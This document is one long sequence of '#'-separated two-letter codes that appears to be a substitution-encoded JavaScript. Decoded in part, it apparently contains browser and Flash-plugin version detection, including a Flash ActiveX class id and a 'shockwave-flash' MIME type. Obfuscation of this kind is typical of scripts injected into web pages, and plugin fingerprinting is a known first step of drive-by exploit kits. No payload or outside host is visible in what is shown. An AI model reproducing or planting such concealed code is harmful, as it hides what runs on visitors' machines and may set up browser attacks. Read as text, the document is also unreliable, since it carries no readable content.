ty#ro#tt#tq#cq#qu#ty#ro#tt#tq#qo#yi#ut#yy#yy#ie#ie#ie#w#tu#tt#yy#yy#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#tu#cq#iq#uy#tt#uw#cqp#ty#qo#ur#yw#ye#ue#w#tt#qo#ty#r#ye#ue#we#uw#uw#tt#uo#cw#tu#cq#wq#tu#r#yy#to#yi#yq#ur#yw#qy#e#u#qu#ye#yp#cw#tt#wp#y#cr#cr#ty#r#ye#ue#wi#ut#yi#tu#cw#tu#ro#y#tq#cq#cq#iq#tu#ro#y#tq#cw#ty#w#tt#wp#u#wq#tu#ro#u#tq#qy#y#w#tt#wp#i#wq#tu#ro#i#tq#qy#y#w#tt#wp#o#wq#tu#ro#o#tq#qy#y#cq#ie#to#yy#ue#to#iq#ye#yp#cw#ty#r#ye#ue#wi#ut#yi#tu#cw#tu#cq#cq#iq#tu#cw#ty#cq#ie#ie#ie#w#yq#to#ur#rr#to#uw#ue#ye#yo#yi#wy#to#yy#ye#yu#ye#ur#to#uw#qy#ci#w#ci#w#cy#cy#yq#to#ur#rr#to#uw#ue#ye#yo#yi#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#tt#cq#iq#uw#to#ur#ut#uw#yi#cqp#yp#ut#yi#tu#ur#ye#yo#yi#cw#yq#w#ti#w#tu#cq#iq#uy#tt#uw#cqp#to#qo#tt#r#ye#yi#ye#ur#cw#yq#cq#w#yp#w#ty#w#yw#qo#iq#ie#qu#ye#yp#cw#to#qi#y#cq#iq#uw#to#ur#ut#uw#yi#cqp#yi#ut#yy#yy#ie#qu#yp#qo#tt#r#up#yy#ut#yq#ye#yi#qu#ye#yp#cw#yp#r#yq#to#ur#rr#to#uw#ue#ye#yo#yi#wy#yo#yi#to#co#qo#u#cq#iq#yp#r#yq#to#ur#rr#to#uw#ue#ye#yo#yi#cw#yi#ut#yy#yy#w#ti#w#tu#cq#qu#ye#yp#cw#yp#r#yq#to#ur#rr#to#uw#ue#ye#yo#yi#wy#yo#yi#to#qo#qo#qo#yi#ut#yy#yy#cq#iq#yp#r#yq#to#ur#rr#to#uw#ue#ye#yo#yi#wy#yo#yi#to#qo#u#ie#ie#tt#r#tu#yy#to#tt#yi#ut#up#cw#cq#qu#ty#qo#cw#yp#r#uy#to#uw#ue#ye#yo#yi#iw#iw#yp#r#uy#to#uw#ue#ye#yo#yi#y#cq#qu#ty#qo#ty#wq#ty#r#uw#to#up#yy#
tt#tu#to#cw#tt#r#ue#up#yy#ye#ur#ey#ut#yu#rp#to#yq#ui#w#tt#r#yq#to#ur#rr#to#uw#ue#ye#yo#yi#wy#to#yy#ye#yu#ye#ur#to#uw#cq#qy#ty#qu#uw#to#ur#ut#uw#yi#cqp#ty#ie#ie#w#tu#yy#to#tt#yi#ut#up#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#cq#iq#ie#w#tt#ti#ti#rt#ye#yi#wu#uy#to#yi#ur#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#ti#w#tu#cq#iq#uy#tt#uw#cqp#to#qo#ur#yw#ye#ue#w#tt#qo#uu#ye#yi#ti#yo#uu#w#ty#qu#ye#yp#cw#to#r#ye#ue#wi#ut#yi#tu#cw#tu#cq#cq#iq#ye#yp#cw#tt#r#tt#ti#ti#wu#uy#to#yi#ur#er#ye#ue#ur#to#yi#to#uw#cq#iq#tt#r#tt#ti#ti#wu#uy#to#yi#ur#er#ye#ue#ur#to#yi#to#uw#cw#ti#w#tu#w#yp#tt#yy#ue#to#cq#ie#to#yy#ue#to#iq#ye#yp#cw#tt#r#tt#ur#ur#tt#tu#yw#wu#uy#to#yi#ur#cq#iq#tt#r#tt#ur#ur#tt#tu#yw#wu#uy#to#yi#ur#cw#ci#yo#yi#ci#q#ti#w#tu#cq#ie#to#yy#ue#to#iq#ty#qo#tt#ro#ci#yo#yi#ci#q#ti#tq#qu#tt#ro#ci#yo#yi#ci#q#ti#tq#qo#to#r#uu#ye#yi#ep#tt#yi#ti#yy#to#uw#cw#tu#w#ty#cq#ie#ie#ie#ie#w#uu#ye#yi#ep#tt#yi#ti#yy#to#uw#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#ti#w#tu#cq#iq#uw#to#ur#ut#uw#yi#cqp#yp#ut#yi#tu#ur#ye#yo#yi#cw#cq#iq#ti#cw#cq#qu#ye#yp#cw#ur#uo#up#to#yo#yp#cqp#tu#qo#qo#ci#yp#ut#yi#tu#ur#ye#yo#yi#ci#cq#iq#tu#cw#cq#ie#ie#ie#w#rt#er#yp#ut#yi#tu#ue#y#qy#ro#tq#w#rt#er#yp#ut#yi#tu#ue#qy#ro#tq#w#uw#ut#yi#rt#er#yp#ut#yi#tu#ue#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#tt#cq#iq#uy#tt#uw#cqp#ty#qo#iq#ie#qu#tt#r#uu#ye#yi#er#yo#tt#ti#to#ti#qo#ur#uw#ut#to#qu#tt#r#tu#tt#yy#yy#we#uw#uw#tt#uo#cw#tt#r#rt#er#yp#ut#yi#tu#ue#y#cq#qu#tt#r#tu#tt#yy#yy#we#uw#uw#tt#uo#cw#tt#r#rt#er#yp#ut#yi#tu#ue#cq#qu#ye#yp#cw#tt#r#yo#yi#wy#yo#yi#to#wu#yu#up#ur#uo#wy#ye#uy#cq#iq#tt#r#yo#yi#wy#yo#yi#to#wu#yu#up#ur#uo#wy#ye#uy#cw#cq#ie#ie#w#uu#ye#yi#er#yo#tt#ti#to#ti#qy#yp#tt#yy#ue#to#w#cy#cy#yo#yi#rt#ye#yi#ti#yo#uu#er#yo#tt#ti#to#ti#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#tt#cq#iq#uw#to#ur#ut#uw#yi#cqp#yp#ut#yi#tu#ur#ye#yo#yi#cw#ty#cq#iq#ye#yp#cw#tt#r#uu#ye#yi#er#yo#tt#ti#to#ti#cq#iq#tt#r#tu#tt#yy#yy#cw#ty#cq#ie#to#yy#ue#to#iq#tt#r#yp#ei#ut#ue#yw#cw#ty#w#tt#r#rt#er#yp#ut#yi#tu#ue#cq#ie#ie#ie#w#ti#ye#uy#qy#yi#ut#yy#yy#w#ti#ye#uy#eq#wy#qy#ci#up#yy#ut#yq#ye#yi#ti#to#ur#to#tu#ur#ci#w#ti#ye
#uy#rt#ye#ti#ur#yw#qy#qq#y#w#up#yy#ut#yq#ye#yi#rq#ye#ip#to#qy#u#w#to#yu#up#ur#uo#wy#ye#uy#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#cq#iq#uy#tt#uw#cqp#ti#qo#ur#yw#ye#ue#w#ty#w#yw#w#tu#w#tt#w#yp#w#yq#qu#ye#yp#cw#ti#r#ti#ye#uy#cr#cr#ti#r#ti#ye#uy#r#tu#yw#ye#yy#ti#ey#yo#ti#to#ue#cq#iq#yp#yo#uw#cw#ty#qo#ti#r#ti#ye#uy#r#tu#yw#ye#yy#ti#ey#yo#ti#to#ue#r#yy#to#yi#yq#ur#yw#e#u#qu#ty#wp#qo#y#qu#ty#e#e#cq#iq#tu#qo#ti#r#ti#ye#uy#r#tu#yw#ye#yy#ti#ey#yo#ti#to#ue#ro#ty#tq#qu#ye#yp#cw#tu#cr#cr#tu#r#tu#yw#ye#yy#ti#ey#yo#ti#to#ue#cq#iq#yp#yo#uw#cw#yw#qo#tu#r#tu#yw#ye#yy#ti#ey#yo#ti#to#ue#r#yy#to#yi#yq#ur#yw#e#u#qu#yw#wp#qo#y#qu#yw#e#e#cq#iq#yq#qo#tu#r#tu#yw#ye#yy#ti#ey#yo#ti#to#ue#ro#yw#tq#qu#ur#uw#uo#iq#tu#r#uw#to#yu#yo#uy#to#wt#yw#ye#yy#ti#cw#yq#cq#ie#tu#tt#ur#tu#yw#cw#yp#cq#iq#ie#ie#ie#ye#yp#cw#tu#cq#iq#ur#uw#uo#iq#ti#r#ti#ye#uy#r#uw#to#yu#yo#uy#to#wt#yw#ye#yy#ti#cw#tu#cq#ie#tu#tt#ur#tu#yw#cw#yp#cq#iq#ie#ie#ie#ie#ye#yp#cw#co#ti#r#ti#ye#uy#cq#iq#tt#qo#ti#yo#tu#ut#yu#to#yi#ur#r#yq#to#ur#wu#yy#to#yu#to#yi#ur#wr#uo#eq#ti#cw#ti#r#ti#ye#uy#eq#wy#cq#qu#ye#yp#cw#tt#cq#iq#ti#r#ti#ye#uy#qo#tt#ie#ie#ye#yp#cw#ti#r#ti#ye#uy#cr#cr#ti#r#ti#ye#uy#r#up#tt#uw#to#yi#ur#ey#yo#ti#to#cq#iq#ur#uw#uo#iq#ti#r#ti#ye#uy#r#up#tt#uw#to#yi#ur#ey#yo#ti#to#r#uw#to#yu#yo#uy#to#wt#yw#ye#yy#ti#cw#ti#r#ti#ye#uy#cq#ie#tu#tt#ur#tu#yw#cw#yp#cq#iq#ie#ti#r#ti#ye#uy#qo#yi#ut#yy#yy#ie#ie#w#wy#eu#ey#wu#yp#ut#yi#tu#ue#qy#ro#tq#w#yo#yi#wy#yo#yi#to#wu#yu#up#ur#uo#wy#ye#uy#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#cq#iq#uy#tt#uw#cqp#tu#qo#ur#yw#ye#ue#w#tt#w#ty#qu#ye#yp#cw#co#tu#r#uu#ye#yi#er#yo#tt#ti#to#ti#cq#iq#uw#to#ur#ut#uw#yi#ie#ye#yp#cw#tu#r#rt#er#yp#ut#yi#tu#ue#cr#cr#tu#r#rt#er#yp#ut#yi#tu#ue#r#yy#to#yi#yq#ur#yw#cr#cr#tu#r#rt#er#yp#ut#yi#tu#ue#ro#tu#r#rt#er#yp#ut#yi#tu#ue#r#yy#to#yi#yq#ur#yw#e#u#tq#co#qo#qo#yi#ut#yy#yy#cq#iq#uw#to#ur#ut#uw#yi#ie#yp#yo#uw#cw#tt#cqp#ye#yi#cqp#tu#cq#iq#ty#qo#tu#ro#tt#tq#qu#ye#yp#cw#ty#cr#cr#ty#r#yp#ut#yi#tu#ue#cq#iq#ye#yp#cw#ty#r#eu#rw#wi#qo#qo#o#cq#iq#uw#to#ur#ut#uw#yi#ie#ye#yp#cw#ty#r#yp#ut#yi#tu#ue#r#yy#to#yi#yq
#ur#yw#cr#cr#ty#r#yp#ut#yi#tu#ue#ro#ty#r#yp#ut#yi#tu#ue#r#yy#to#yi#yq#ur#yw#e#u#tq#co#qo#qo#yi#ut#yy#yy#cq#iq#uw#to#ur#ut#uw#yi#ie#ie#ie#yp#yo#uw#cw#tt#qo#y#qu#tt#qi#tu#r#wy#eu#ey#wu#yp#ut#yi#tu#ue#r#yy#to#yi#yq#ur#yw#qu#tt#q#q#cq#iq#tu#r#tu#tt#yy#yy#we#uw#uw#tt#uo#cw#tu#r#wy#eu#ey#wu#yp#ut#yi#tu#ue#cq#ie#tu#r#to#yu#up#ur#uo#wy#ye#uy#cw#cq#ie#w#yq#to#ur#rt#ye#ti#ur#yw#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#tu#cq#iq#ye#yp#cw#tu#cq#iq#uy#tt#uw#cqp#tt#qo#tu#r#ue#tu#uw#yo#yy#yy#rt#ye#ti#ur#yw#iw#iw#tu#r#yo#yp#yp#ue#to#ur#rt#ye#ti#ur#yw#w#ty#qo#ur#yw#ye#ue#qu#ye#yp#cw#ty#r#ye#ue#ey#ut#yu#cw#tt#cq#cq#iq#uw#to#ur#ut#uw#yi#cqp#tt#ie#ie#uw#to#ur#ut#uw#yi#cqp#e#u#ie#w#yq#to#ur#rw#tt#yq#rq#ur#tt#ur#ut#ue#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#yu#w#yq#w#tt#w#ty#cq#iq#uy#tt#uw#cqp#tu#qo#ur#yw#ye#ue#w#yp#w#yt#qo#yu#r#ue#up#tt#yi#w#yy#qo#tu#r#yq#to#ur#rt#ye#ti#ur#yw#cw#yt#cq#w#yw#qo#tt#r#ue#up#tt#yi#w#yr#qo#tu#r#yq#to#ur#rt#ye#ti#ur#yw#cw#yw#cq#w#ti#qo#yq#r#ue#up#tt#yi#w#ye#qo#tu#r#yq#to#ur#rt#ye#ti#ur#yw#cw#ti#cq#qu#ye#yp#cw#co#yt#iw#iw#co#yw#iw#iw#co#ti#iw#iw#co#tu#r#yq#to#ur#wy#eu#et#yo#ty#yr#cw#yu#cq#cq#iq#uw#to#ur#ut#uw#yi#cqp#e#i#ie#ye#yp#cw#yr#qi#ye#iw#iw#yy#qi#y#iw#iw#yr#qi#y#iw#iw#ye#qi#y#iw#iw#ye#qi#qo#tu#r#up#yy#ut#yq#ye#yi#rq#ye#ip#to#iw#iw#tu#r#up#yy#ut#yq#ye#yi#rq#ye#ip#to#qi#u#cq#iq#uw#to#ur#ut#uw#yi#cqp#y#ie#ye#yp#cw#yy#wp#qo#ye#cq#iq#uw#to#ur#ut#uw#yi#cqp#e#u#ie#ur#uw#uo#iq#ye#yp#cw#yy#qo#qo#tu#r#up#yy#ut#yq#ye#yi#rq#ye#ip#to#cr#cr#cw#co#tu#r#ye#ue#eq#wu#iw#iw#tu#r#yq#to#ur#wy#eu#et#yo#ty#yr#cw#yu#cq#r#uw#to#tt#ti#uo#rq#ur#tt#ur#to#qo#qo#qp#cq#cq#iq#ye#yp#cw#co#yu#r#uu#ye#yi#er#yo#tt#ti#to#ti#cr#cr#tu#r#uu#ye#yi#er#yo#tt#ti#to#ti#cq#iq#uw#to#ur#ut#uw#yi#cqp#u#ie#ye#yp#cw#yu#r#uu#ye#yi#er#yo#tt#ti#to#ti#cr#cr#tu#r#ye#ue#ey#ut#yu#cw#ty#cq#cq#iq#ye#yp#cw#co#tu#r#ye#ue#ey#ut#yu#cw#yu#r#tu#yo#ut#yi#ur#cq#cq#iq#yu#r#tu#yo#ut#yi#ur#qo#ty#ie#ye#yp#cw#ty#e#yu#r#tu#yo#ut#yi#ur#wp#qo#u#y#cq#iq#uw#to#ur#ut#uw#yi#cqp#u#ie#ie#ie#ie#tu#tt#ur#tu#yw#cw#yp#cq#iq#ie#uw#to#ur#ut#uw#yi#cqp#y#ie#w#yq#to
#ur#wy#eu#et#yo#ty#yr#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#yq#w#tt#cq#iq#uy#tt#uw#cqp#yp#w#ti#qo#ur#yw#ye#ue#w#tu#qo#yq#wq#yq#r#ue#up#tt#yi#qy#y#w#ty#qo#tu#cr#cr#tu#r#yp#ye#uw#ue#ur#wt#yw#ye#yy#ti#wq#u#qy#y#qu#ur#uw#uo#iq#ye#yp#cw#ty#cr#cr#tt#cq#iq#tu#r#yp#ye#uw#ue#ur#wt#yw#ye#yy#ti#r#yp#yo#tu#ut#ue#cw#cq#ie#ie#tu#tt#ur#tu#yw#cw#yp#cq#iq#ie#uw#to#ur#ut#uw#yi#cqp#ty#wq#tu#r#yp#ye#uw#ue#ur#wt#yw#ye#yy#ti#qy#yi#ut#yy#yy#ie#w#ue#to#ur#rq#ur#uo#yy#to#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#ty#w#yq#cq#iq#uy#tt#uw#cqp#yp#qo#ty#r#ue#ur#uo#yy#to#w#tt#w#ti#w#tu#qo#ur#yw#ye#ue#qu#ye#yp#cw#yp#cr#cr#yq#cq#iq#yp#yo#uw#cw#tt#qo#y#qu#tt#qi#yq#r#yy#to#yi#yq#ur#yw#qu#tt#qo#tt#q#i#cq#iq#ur#uw#uo#iq#yp#ro#yq#ro#tt#tq#tq#qo#yq#ro#tt#q#u#tq#ie#tu#tt#ur#tu#yw#cw#ti#cq#iq#ie#ie#ie#ie#w#ye#yi#ue#to#uw#ur#wy#ye#uy#eq#yi#wr#yo#ti#uo#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#tt#w#ye#cq#iq#uy#tt#uw#cqp#yw#w#yp#qo#ur#yw#ye#ue#w#ty#qo#ci#up#ti#o#o#qt#qt#o#o#qt#qt#ci#w#ti#qo#yi#ut#yy#yy#w#yr#qo#ye#wq#uu#ye#yi#ti#yo#uu#r#ur#yo#up#r#ti#yo#tu#ut#yu#to#yi#ur#qy#uu#ye#yi#ti#yo#uu#r#ti#yo#tu#ut#yu#to#yi#ur#w#tu#qo#ci#qi#ci#w#yq#qo#cw#yr#r#yq#to#ur#wu#yy#to#yu#to#yi#ur#ue#wr#uo#rw#tt#yq#ey#tt#yu#to#cw#ci#ty#yo#ti#uo#ci#cq#ro#y#tq#iw#iw#yr#r#ty#yo#ti#uo#cq#qu#ye#yp#cw#co#yq#cq#iq#ur#uw#uo#iq#yr#r#uu#uw#ye#ur#to#cw#tu#q#ce#ti#ye#uy#cqp#ye#ti#qo#ci#ce#q#ty#q#ce#ci#wp#yo#ce#q#tu#q#ci#t#ti#ye#uy#wp#ci#cq#qu#ti#qo#yr#r#yq#to#ur#wu#yy#to#yu#to#yi#ur#wr#uo#eq#ti#cw#ty#cq#ie#tu#tt#ur#tu#yw#cw#yw#cq#iq#ie#ie#yq#qo#cw#yr#r#yq#to#ur#wu#yy#to#yu#to#yi#ur#ue#wr#uo#rw#tt#yq#ey#tt#yu#to#cw#ci#ty#yo#ti#uo#ci#cq#ro#y#tq#iw#iw#yr#r#ty#yo#ti#uo#cq#qu#ye#yp#cw#yq#cq#iq#ye#yp#cw#yq#r#yp#ye#uw#ue#ur#wt#yw#ye#yy#ti#cr#cr#yp#r#ye#ue#wy#to#yp#ye#yi#to#ti#cw#yq#r#ye#yi#ue#to#uw#ur#wr#to#yp#yo#uw#to#cq#cq#iq#yq#r#ye#yi#ue#to#uw#ur#wr#to#yp#yo#uw#to#cw#tt#w#yq#r#yp#ye#uw#ue#ur#wt#yw#ye#yy#ti#cq#ie#to#yy#ue#to#iq#yq#r#tt#up#up#to#yi#ti#wt#yw#ye#yy#ti#cw#tt#cq#ie#ye#yp#cw#ti#cq#iq#yq#r#uw#to#yu#yo#uy#to#wt#yw#ye#yy#ti#cw#ti#cq#ie#ie#to#yy#ue#to#iq#ie#ie#w#ye#yi#u
e#to#uw#ur#ep#rw#et#er#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#yq#w#ty#w#yw#w#tt#w#yt#cq#iq#uy#tt#uw#cqp#yy#w#yu#qo#ti#yo#tu#ut#yu#to#yi#ur#w#yr#qo#ur#yw#ye#ue#w#up#w#yo#qo#yu#r#tu#uw#to#tt#ur#to#wu#yy#to#yu#to#yi#ur#cw#ci#ue#up#tt#yi#ci#cq#w#yi#w#ye#w#yp#qo#ci#qi#ci#qu#uy#tt#uw#cqp#tu#qo#ro#ci#yo#ut#ur#yy#ye#yi#to#rq#ur#uo#yy#to#ci#w#ci#yi#yo#yi#to#ci#w#ci#ty#yo#uw#ti#to#uw#rq#ur#uo#yy#to#ci#w#ci#yi#yo#yi#to#ci#w#ci#up#tt#ti#ti#ye#yi#yq#ci#w#ci#y#up#ui#ci#w#ci#yu#tt#uw#yq#ye#yi#ci#w#ci#y#up#ui#ci#w#ci#uy#ye#ue#ye#ty#ye#yy#ye#ur#uo#ci#w#ci#uy#ye#ue#ye#ty#yy#to#ci#tq#qu#ye#yp#cw#co#yr#r#ye#ue#wy#to#yp#ye#yi#to#ti#cw#tt#cq#cq#iq#tt#qo#ci#ci#ie#ye#yp#cw#yr#r#ye#ue#rq#ur#uw#ye#yi#yq#cw#yq#cq#cr#cr#cw#t#ro#tw#tp#ue#tq#t#cq#r#ur#to#ue#ur#cw#yq#cq#cq#iq#up#qo#yp#q#yq#q#ce#cqp#uu#ye#ti#ur#yw#qo#ci#ce#q#yr#r#up#yy#ut#yq#ye#yi#rq#ye#ip#to#q#ce#ci#cqp#yw#to#ye#yq#yw#ur#qo#ci#ce#q#yr#r#up#yy#ut#yq#ye#yi#rq#ye#ip#to#q#ce#ci#cqp#ce#qu#yp#yo#uw#cw#yi#qo#y#qu#yi#qi#ty#r#yy#to#yi#yq#ur#yw#qu#yi#qo#yi#q#i#cq#iq#ye#yp#cw#t#ro#tw#tp#ue#tq#t#r#ur#to#ue#ur#cw#ty#ro#yi#q#u#tq#cq#cq#iq#up#q#qo#ty#ro#yi#tq#q#ce#qo#ci#ce#q#ty#ro#yi#q#u#tq#q#ce#ci#cqp#ce#ie#ie#up#q#qo#ci#wp#ci#qu#yp#yo#uw#cw#yi#qo#y#qu#yi#qi#yw#r#yy#to#yi#yq#ur#yw#qu#yi#qo#yi#q#i#cq#iq#ye#yp#cw#t#ro#tw#tp#ue#tq#t#r#ur#to#ue#ur#cw#yw#ro#yi#q#u#tq#cq#cq#iq#up#q#qo#yp#q#ce#up#tt#uw#tt#yu#cqp#yi#tt#yu#to#qo#ci#ce#q#yw#ro#yi#tq#q#ce#ci#cqp#uy#tt#yy#ut#to#qo#ci#ce#q#yw#ro#yi#q#u#tq#q#ce#ci#cqp#t#wp#ce#ie#ie#up#q#qo#tt#q#yp#q#ci#t#ci#q#yq#q#ci#wp#ci#ie#to#yy#ue#to#iq#up#qo#tt#ie#ye#yp#cw#co#yr#r#ti#ye#uy#cq#iq#ye#qo#yu#r#yq#to#ur#wu#yy#to#yu#to#yi#ur#wr#uo#eq#ti#cw#yr#r#ti#ye#uy#eq#wy#cq#qu#ye#yp#cw#ye#cq#iq#yr#r#ti#ye#uy#qo#ye#ie#to#yy#ue#to#iq#yr#r#ti#ye#uy#qo#yu#r#tu#uw#to#tt#ur#to#wu#yy#to#yu#to#yi#ur#cw#ci#ti#ye#uy#ci#cq#qu#yr#r#ti#ye#uy#r#ye#ti#qo#yr#r#ti#ye#uy#eq#wy#qu#yr#r#ye#yi#ue#to#uw#ur#wy#ye#uy#eq#yi#wr#yo#ti#uo#cw#yr#r#ti#ye#uy#cq#ie#yr#r#ue#to#ur#rq#ur#uo#yy#to#cw#yr#r#ti#ye#uy#w#tu#r#tu#yo#yi#tu#tt#ur#cw#ro#ci#uu#ye#ti#ur#yw#c
i#w#yr#r#ti#ye#uy#rt#ye#ti#ur#yw#q#ci#up#ui#ci#w#ci#yw#to#ye#yq#yw#ur#ci#w#cw#yr#r#up#yy#ut#yq#ye#yi#rq#ye#ip#to#q#o#cq#q#ci#up#ui#ci#w#ci#yp#yo#yi#ur#rq#ye#ip#to#ci#w#cw#yr#r#up#yy#ut#yq#ye#yi#rq#ye#ip#to#q#o#cq#q#ci#up#ui#ci#w#ci#yy#ye#yi#to#ep#to#ye#yq#yw#ur#ci#w#cw#yr#r#up#yy#ut#yq#ye#yi#rq#ye#ip#to#q#o#cq#q#ci#up#ui#ci#w#ci#uy#to#uw#ur#ye#tu#tt#yy#we#yy#ye#yq#yi#ci#w#ci#ty#tt#ue#to#yy#ye#yi#to#ci#w#ci#ti#ye#ue#up#yy#tt#uo#ci#w#ci#ty#yy#yo#tu#yt#ci#tq#cq#cq#qu#ye#yp#cw#co#ye#cq#iq#yr#r#ue#to#ur#rq#ur#uo#yy#to#cw#yr#r#ti#ye#uy#w#ro#ci#up#yo#ue#ye#ur#ye#yo#yi#ci#w#ci#tt#ty#ue#yo#yy#ut#ur#to#ci#w#ci#uw#ye#yq#yw#ur#ci#w#ci#y#up#ui#ci#w#ci#ur#yo#up#ci#w#ci#y#up#ui#ci#tq#cq#ie#ie#ye#yp#cw#yr#r#ti#ye#uy#cr#cr#yr#r#ti#ye#uy#r#up#tt#uw#to#yi#ur#ey#yo#ti#to#cq#iq#yr#r#ti#ye#uy#r#tt#up#up#to#yi#ti#wt#yw#ye#yy#ti#cw#yo#cq#qu#yr#r#ue#to#ur#rq#ur#uo#yy#to#cw#yo#w#tu#r#tu#yo#yi#tu#tt#ur#cw#ro#ci#yp#yo#yi#ur#rq#ye#ip#to#ci#w#cw#yr#r#up#yy#ut#yq#ye#yi#rq#ye#ip#to#q#o#cq#q#ci#up#ui#ci#w#ci#yy#ye#yi#to#ep#to#ye#yq#yw#ur#ci#w#cw#yr#r#up#yy#ut#yq#ye#yi#rq#ye#ip#to#q#o#cq#q#ci#up#ui#ci#w#ci#uy#to#uw#ur#ye#tu#tt#yy#we#yy#ye#yq#yi#ci#w#ci#ty#tt#ue#to#yy#ye#yi#to#ci#w#ci#ti#ye#ue#up#yy#tt#uo#ci#w#ci#ye#yi#yy#ye#yi#to#ci#tq#cq#cq#qu#ur#uw#uo#iq#ye#yp#cw#yo#cr#cr#yo#r#up#tt#uw#to#yi#ur#ey#yo#ti#to#cq#iq#yo#r#yp#yo#tu#ut#ue#cw#cq#ie#ie#tu#tt#ur#tu#yw#cw#yy#cq#iq#ie#ur#uw#uo#iq#yo#r#ye#yi#yi#to#uw#ep#rw#et#er#qo#up#ie#tu#tt#ur#tu#yw#cw#yy#cq#iq#ie#ye#yp#cw#yo#r#tu#yw#ye#yy#ti#ey#yo#ti#to#ue#r#yy#to#yi#yq#ur#yw#qo#qo#u#cr#cr#co#cw#yr#r#ye#ue#wo#to#tu#yt#yo#cr#cr#yr#r#tu#yo#yu#up#tt#uw#to#ey#ut#yu#ue#cw#yr#r#uy#to#uw#wo#to#tu#yt#yo#w#ci#u#w#qq#w#y#w#y#ci#cq#qi#y#cq#cq#iq#yr#r#ue#to#ur#rq#ur#uo#yy#to#cw#yo#r#yp#ye#uw#ue#ur#wt#yw#ye#yy#ti#w#tu#r#tu#yo#yi#tu#tt#ur#cw#ro#ci#ti#ye#ue#up#yy#tt#uo#ci#w#ci#ye#yi#yy#ye#yi#to#ci#tq#cq#cq#ie#uw#to#ur#ut#uw#yi#iq#ue#up#tt#yi#qy#yo#w#uu#ye#yi#er#yo#tt#ti#to#ti#qy#yr#r#uu#ye#yi#er#yo#tt#ti#to#ti#w#ur#tt#yq#ey#tt#yu#to#qy#cw#yr#r#ye#ue#rq#ur#uw#ye#yi#yq#cw#
yq#cq#wq#yq#qy#ci#ci#cq#ie#ie#uw#to#ur#ut#uw#yi#iq#ue#up#tt#yi#qy#yi#ut#yy#yy#w#uu#ye#yi#er#yo#tt#ti#to#ti#qy#yr#r#uu#ye#yi#er#yo#tt#ti#to#ti#w#ur#tt#yq#ey#tt#yu#to#qy#ci#ci#ie#ie#w#yp#yy#tt#ue#yw#qy#iq#yu#ye#yu#to#rw#uo#up#to#qy#ci#tt#up#up#yy#ye#tu#tt#ur#ye#yo#yi#t#ui#e#ue#yw#yo#tu#yt#uu#tt#uy#to#e#yp#yy#tt#ue#yw#ci#w#up#uw#yo#yq#eq#wy#qy#ci#rq#yw#yo#tu#yt#uu#tt#uy#to#wi#yy#tt#ue#yw#r#rq#yw#yo#tu#yt#uu#tt#uy#to#wi#yy#tt#ue#yw#ci#w#tu#yy#tt#ue#ue#eq#wy#qy#ci#tu#yy#ue#ye#ti#qy#wy#i#qe#wt#wy#wr#qw#wu#e#we#wu#qw#wy#e#u#u#wt#wi#e#qt#qw#wr#qr#e#qp#qp#qp#qq#qq#o#qq#qp#y#y#y#y#ci#w#yq#to#ur#rr#to#uw#ue#ye#yo#yi#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#cq#iq#uy#tt#uw#cqp#ty#qo#yp#ut#yi#tu#ur#ye#yo#yi#cw#ye#cq#iq#ye#yp#cw#co#ye#cq#iq#uw#to#ur#ut#uw#yi#cqp#yi#ut#yy#yy#ie#uy#tt#uw#cqp#to#qo#t#ro#tp#ti#tq#ro#tp#ti#tp#w#tp#r#tp#ue#tq#p#ro#uw#rp#ti#wy#tq#iq#y#w#u#ie#ro#tp#ti#tp#w#tq#p#t#r#to#ui#to#tu#cw#ye#cq#qu#uw#to#ur#ut#uw#yi#cqp#to#wq#to#ro#y#tq#r#uw#to#up#yy#tt#tu#to#cw#t#ro#uw#rp#ti#wy#tp#r#tq#t#yq#w#ci#w#ci#cq#r#uw#to#up#yy#tt#tu#to#cw#t#tp#ue#t#yq#w#ci#ci#cq#qy#yi#ut#yy#yy#ie#qu#uy#tt#uw#cqp#yr#qo#ur#yw#ye#ue#w#yq#qo#yr#r#cy#w#yt#w#yw#w#yy#qo#yi#ut#yy#yy#w#tu#qo#yi#ut#yy#yy#w#tt#qo#yi#ut#yy#yy#w#yp#w#yu#w#ti#qu#ye#yp#cw#co#yq#r#ye#ue#eq#wu#cq#iq#yu#qo#yq#r#yw#tt#ue#et#ye#yu#to#rw#uo#up#to#cw#yr#r#yu#ye#yu#to#rw#uo#up#to#cq#qu#ye#yp#cw#yu#cq#iq#yp#qo#yq#r#yq#to#ur#wy#eu#et#yo#ty#yr#cw#yq#r#ye#yi#ue#to#uw#ur#ep#rw#et#er#cw#ci#yo#ty#yr#to#tu#ur#ci#w#ro#ci#ur#uo#up#to#ci#w#yr#r#yu#ye#yu#to#rw#uo#up#to#tq#w#ro#tq#w#ci#ci#w#yr#cq#cq#qu#ur#uw#uo#iq#yy#qo#yq#r#yq#to#ur#ey#ut#yu#cw#yp#r#wo#to#ur#rr#tt#uw#ye#tt#ty#yy#to#cw#ci#cy#uy#to#uw#ue#ye#yo#yi#ci#cq#cq#ie#tu#tt#ur#tu#yw#cw#yt#cq#iq#ie#ie#ye#yp#cw#co#yy#cq#iq#ti#qo#yu#wq#yu#r#to#yi#tt#ty#yy#to#ti#ei#yy#ut#yq#ye#yi#qy#yi#ut#yy#yy#qu#ye#yp#cw#ti#cr#cr#ti#r#ti#to#ue#tu#uw#ye#up#ur#ye#yo#yi#cq#iq#yy#qo#ty#cw#ti#r#ti#to#ue#tu#uw#ye#up#ur#ye#yo#yi#cq#ie#ye#yp#cw#yy#cq#iq#yy#qo#yq#r#yq#to#ur#ei#yy#ut#yq#ye#yi#wi#ye#yy#to#rr#to#uw#ue#ye#yo#yi#
